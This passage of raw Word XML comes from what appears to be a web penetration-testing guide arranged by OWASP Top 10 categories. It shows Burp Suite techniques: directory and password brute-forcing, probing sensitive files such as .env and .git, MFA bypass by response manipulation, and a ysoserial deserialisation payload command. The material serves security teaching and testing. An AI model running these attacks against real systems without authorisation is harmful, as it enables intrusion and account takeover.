      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Intruder with wordlist (SecLists/Discovery/Web-Content/common.txt) to brute-force directories</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for: /backup, /.git, /phpinfo.php, /web.config, /.env, /admin, /swagger-ui.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Check JS files in Proxy History for hardcoded endpoints and API keys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Param Miner to discover hidden parameters</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CWE-16 (Configuration), CWE-942 (Permissive CORS), CWE-200 (Information Exposure), CWE-548 (Directory Listing)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE Examples: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2017-5638 (Apache Struts — misconfigured Content-Type parsing → RCE), CVE-2020-5902 (F5 BIG-IP unauth RCE via exposed mgmt endpoint)</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A06:2021 — Vulnerable &amp; Outdated Components</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Applications frequently use libraries, frameworks, and components with known vulnerabilities. Identifying these component versions and mapping them to CVEs is a key pentest activity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Identification with Burp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Proxy all traffic — check response headers: X-Powered-By, Server, X-Generator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Install 'Software Vulnerability Scanner' BApp — auto-flags known vulnerable versions in responses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Examine HTML source for library version comments: jQuery v1.6.0, Bootstrap 3.1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">JavaScript files often contain version strings: build/react.min.16.0.0.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Manual Version Extraction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  GET /package.json  → Node.js dependency versions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  GET /composer.json → PHP package versions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  GET /WEB-INF/web.xml → Java Servlet version info</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  GET /robots.txt + /readme.html → CMS version (WordPress, Drupal)</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CWE-1104 (Use of Unmaintained Third-Party Components), CWE-937 (OWASP Top 10 A9 – Using Components with Known Vulns)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE Examples: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2017-9805 (Apache Struts REST plugin RCE), CVE-2019-0232 (Apache Tomcat CGI injection), Log4Shell CVE-2021-44228</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A07:2021 — Identification &amp; Authentication Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication failures include weak password policies, broken brute-force protection, insecure session management, missing MFA, and credential stuffing vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Brute Force Attack with Intruder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Capture POST /login request in Proxy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Send to Intruder → Positions tab → clear all, mark password field with §§</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payloads → Simple List → load /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Options → Grep Match → add 'Invalid password' and 'Welcome'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Start Attack → sort by response length or Grep Match column</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Session Token Analysis with Sequencer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Capture a response that sets a session cookie or token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Right-click → Send to Sequencer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Select the token location, click 'Start live capture' (collect 500+ samples)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyse → if entropy is Poor/below FIPS threshold → predictable token vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Multi-Factor Authentication Bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">MFA code brute force: Intruder on 4-6 digit code with no rate limit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">MFA skip: after step 1 (password), directly browse to post-auth URL without completing MFA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Response manipulation: if step-2 response is JSON {success:false}, use Match &amp; Replace to change to {success:true}</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CWE-287 (Improper Authentication), CWE-307 (Brute Force), CWE-613 (Insufficient Session Expiration), CWE-330 (Weak Randomness)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE Examples: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2022-22972 (VMware vCenter auth bypass), CVE-2023-20887 (VMware vRealize RCE via auth bypass)</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A08:2021 — Software &amp; Data Integrity Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Includes insecure deserialization, unsigned updates, CI/CD pipeline attacks, and untrusted data being deserialised without verification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Insecure Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Java serialised objects: identified by base64 starting with 'rO0AB' or bytes 0xaced 0x0005</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP serialisation: O:4:"User":2:{s:4:"name";s:5:"admin";}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use ysoserial to generate Java gadget chain payloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  java -jar ysoserial.jar CommonsCollections6 'id' | base64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Send via Burp Repeater in the serialised object parameter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Burp Collaborator to confirm blind RCE via DNS/HTTP callback</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CWE-502 (Deserialization of Untrusted Data), CWE-345 (Insufficient Verification of Data Authenticity)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE Examples: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2015-4852 (Oracle WebLogic Java deser RCE), CVE-2017-9822 (DotNetNuke deser RCE)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A09:2021 — Security Logging &amp; Monitoring Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Applications that fail to log security events, detect attacks, or alert on suspicious activity allow attackers extended dwell time. As a pentester, you verify the absence of these controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Testing Approach</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
